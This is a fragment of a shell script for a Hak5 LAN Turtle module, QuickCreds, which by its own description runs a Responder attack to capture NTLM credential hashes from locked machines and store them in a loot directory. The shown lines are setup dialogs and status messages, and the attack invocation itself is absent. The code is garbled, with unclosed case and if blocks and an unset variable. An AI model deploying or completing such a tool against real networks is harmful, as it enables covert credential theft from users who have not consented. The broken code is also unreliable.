DESCRIPTION="Snagging creds from locked machines --Mubix, Implements responder attack and saves creds to numbered directories in /root/loot. LED will blink while QuickCreds is running. Upon capture of NTLM hash the LED will light solid. Author: Hak5Darren. Credit: Mubix."
# Ask if the user really wants to install the module and its dependencies
/usr/bin/dialog --title "QuickCreds" --yesno "\nInstall dependencies and configure QuickCreds?\nAn Internet connection is required for installation.\n" 8 60
case $response in
0) ;;
1) exit ;;
255) exit ;;
# Check to see if QuickCreds has already been configured
if [[ -d "$LOOTDIR" || -s "$RESPLOG" ]]; then
/usr/bin/dialog --title "QuickCreds" --msgbox "\nThe QuickCreds module is already configured.\nCreds are saved to $LOOTDIR.\nEnable this module to attack on boot." 9 72
/usr/bin/dialog --title "QuickCreds" --msgbox "\nThe LAN Turtle is currently offline.\nPlease connect the LAN Turtle to the Internet and try again." 9 72
/usr/bin/dialog --title "QuickCreds" --msgbox "\nConfiguration complete. Creds will be saved to $LOOTDIR\nEnable this module to have it start the attack on boot.\n" 9 72
# Stop on-off-on DHCP blink pattern script, this is what causes the "Terminated" text to appear if running QuickCreds from within the Turtle module system in the Turtle "GUI"
/bin/echo "Stopping DHCP Detect Blink Script"
/etc/init.d/dhcp_detect stop
/bin/echo ""
/bin/echo "QuickCreds started."
/bin/echo "The orange LED will blink while QuickCreds is running."
/bin/echo "The orange LED will turn solid upon NTLM hash capture."
/bin/echo ""
/bin/echo "If starting this module from the Turtle Shell menu,"
/bin/echo "press CTRL+C to return."
# Create new numbered loot directory and symlink it from Responder logs
# Adjust the number when creating the numbered lootdir for this session, if no existing dirs (i.e. wc -l = 0) then start with 1 instead of 0 otherwise there will be a gap between 0 and 2